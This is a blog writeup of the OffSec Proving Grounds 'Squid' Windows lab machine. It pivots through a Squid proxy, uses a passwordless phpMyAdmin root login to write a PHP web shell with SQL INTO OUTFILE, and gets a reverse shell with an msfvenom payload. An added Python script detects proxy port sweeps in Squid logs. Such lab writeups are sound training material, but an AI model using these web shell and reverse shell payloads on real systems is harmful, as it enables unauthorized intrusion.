title: Proving grounds Practice: Squid
layout: post
date: 2023-08-20 06:00
tag: CTF, Offsec labs, OSCP, Writeup, Windows, Pg-Practice
writeups: true
hidden: true
author: Naveen
description: Offsec proving grounds practice windows machine writeup

Nmap

PORT     STATE SERVICE    VERSION
3128/tcp open  http-proxy Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved

A Squid HTTP proxy service is running on port 3128. Use Squid Pivoting Open Port Scanner to perform port scanning.

Configure the proxy server's IP and port in the browser to access the web server running on port 8080.
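
Defender's view of the proxy pivot described above, as an added example that is not part of the original writeup: a parser for Squid's native access.log format that flags a client requesting many distinct ports on one target through the proxy. The sample log lines, the client address 192.168.45.5 and the `min_ports` threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Squid native access.log: time elapsed client code/status bytes method URL ...
LINE = re.compile(r"^\d+\.\d+\s+\d+\s+(\S+)\s+(\w+)/(\d{3})\s+\d+\s+(\S+)\s+(\S+)")
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21}

def parse(line):
    """Return (client, host, port, answered) for one log line, or None."""
    m = LINE.match(line)
    if not m:
        return None
    client, code, status, method, url = m.groups()
    try:
        # CONNECT targets are logged as host:port, other methods as a full URL.
        parts = urlsplit("//" + url if method == "CONNECT" else url)
        host, port = parts.hostname, parts.port or DEFAULT_PORTS.get(parts.scheme)
    except ValueError:                      # malformed port in the logged URL
        return None
    if not host or not port:
        return None
    # Assumption: a denied request or a 5xx means Squid got no answer upstream.
    answered = not code.startswith("TCP_DENIED") and int(status) < 500
    return client, host, port, answered

def find_port_sweeps(lines, min_ports=5):
    """Flag (client, target) pairs that requested >= min_ports distinct ports."""
    tried, answered = defaultdict(set), defaultdict(set)
    for client, host, port, ok in filter(None, map(parse, lines)):
        tried[(client, host)].add(port)
        if ok:
            answered[(client, host)].add(port)
    return {k: {"tried": sorted(p), "answered": sorted(answered[k])}
            for k, p in tried.items() if len(p) >= min_ports}

# Constructed sample log: the client addresses, sizes and timings are made up.
SAMPLE_LOG = """\
1692511201.101      3 192.168.45.5 TCP_MISS/503 4027 GET http://192.168.237.189:21/ - HIER_NONE/- text/html
1692511201.140      2 192.168.45.5 TCP_MISS/503 4027 GET http://192.168.237.189:22/ - HIER_NONE/- text/html
1692511201.182      2 192.168.45.5 TCP_MISS/503 4029 GET http://192.168.237.189:445/ - HIER_NONE/- text/html
1692511201.221      3 192.168.45.5 TCP_MISS/503 4031 GET http://192.168.237.189:3306/ - HIER_NONE/- text/html
1692511201.260     41 192.168.45.5 TCP_MISS/200 5120 GET http://192.168.237.189:8080/ - HIER_DIRECT/192.168.237.189 text/html
1692511305.000    120 10.0.0.23 TCP_TUNNEL/200 8812 CONNECT example.com:443 - HIER_DIRECT/203.0.113.10 -
""".splitlines()

if __name__ == "__main__":
    for (client, host), p in find_port_sweeps(SAMPLE_LOG).items():
        print(f"{client} swept {host}: tried {p['tried']}, answered {p['answered']}")
```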

System Information

PHPMyadmin

Log in with username root and password as null.

Execute the SQL query below to write a PHP web shell to the web root.

SELECT "<?php system($_GET['cmd'])?>" INTO OUTFILE "C:/wamp/www/shell2.php"

As shown in the phpinfo() page, the document root folder is C:/wamp/www, so the shell will be publicly accessible at http://192.168.237.189:8080/shell2.php.

Remote Code Execution

http://192.168.237.189:8080/shell2.php?cmd=whoami

Obtain Stable Shell using msfvenom

msfvenom -f exe -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=1234 -o mshell.exe

Use curl to download the shell onto the attacking machine. Run an nc listener and execute the reverse shell by visiting http://192.168.237.189:8080/shell2.php?cmd=mshell.exe

Reverse shell obtained.

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.